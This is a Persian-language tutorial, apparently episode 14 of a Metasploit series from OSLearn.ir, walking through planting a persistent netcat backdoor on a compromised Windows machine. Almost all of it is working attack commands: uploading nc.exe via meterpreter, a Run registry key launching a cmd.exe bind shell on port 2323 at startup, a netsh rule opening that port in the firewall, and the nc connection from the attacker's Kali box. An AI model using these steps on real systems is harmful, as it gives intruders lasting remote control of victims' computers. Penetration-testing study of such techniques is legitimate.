سلام دوستان . قسمت چهاردهم از سری آموزش های متااسپلویت را در پیش رو داریم . همان طور که از عنوان مشخص است . امروز به ساخت یک backdoor در سیستم قربانی با استفاده از NC می پردازیم . روند کار به این صورت است که با استفاده از رجیستری NC را بر روی یک پورت به صورت listing در میاریم سپس از سیستم خودمون به تارگت متصل می شیم .
ابتدا توپولوژی زیر را فرض کنید :
کار خودمون رو با فرض این که از سیستم قربانی دسترسی داریم شروع می کنیم . برای کار گذاشتن backdoor بر روی سیستم قربانی از ریجستری استفاده می کنیم . پس در اولین قدم برنامه ی net cat را بر روی سیستم قربانی آپلود می کنیم :
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\windows\system32
حال nc را به شکل start up در سیستم فعال می کنیم :
meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:windowssystem32nc.exe -Ldp 2323 -e cmd.exe'
نکته : همان طور که مشاهده می کنید , پورت listing را بر روی 2323 گذاشتیم اما می توانید آن را تغییر دهید .
در آخر برای مشاهده تغییرات انجام شده در ریجستری به شکل زیر عمل می کنیم :
meterpreter > reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
توجه : پورت listing را بر روی 2323 تنظیم کردیم . پس با فرض فعال بودن فایروال پیش فرض ویندوز , لازم است این پورت بر روی فایروال add شود . برای این منظور با استفاده از دستور shell در محیط meterpreter وارد محیط CMD سیستم قربانی می شویم و در نهایت پورت 2323 را به فایروال اضافه می کنیم :
C:Documents and SettingsAdministratorDesktopOSLearn>netsh firewall add portopening TCP 2323 "OSLearn" ENABLE ALL
برای مشاهده ی تغییرات از دستور netsh در محیط خط فرمان به شکل زیر استفاده می کنیم :
C:Documents and SettingsAdministratorDesktopOSLearn>netsh firewall show portopening
در آخر برای اتصال به backdoor به شکل زیر عمل خواهیم کرد :
root@kali:~# nc -v 10.10.10.2 2323
موفق و موید باشید .
منبع : او اس لرن دات آی آر | http://OSLearn.ir
نویسنده : E2MA3N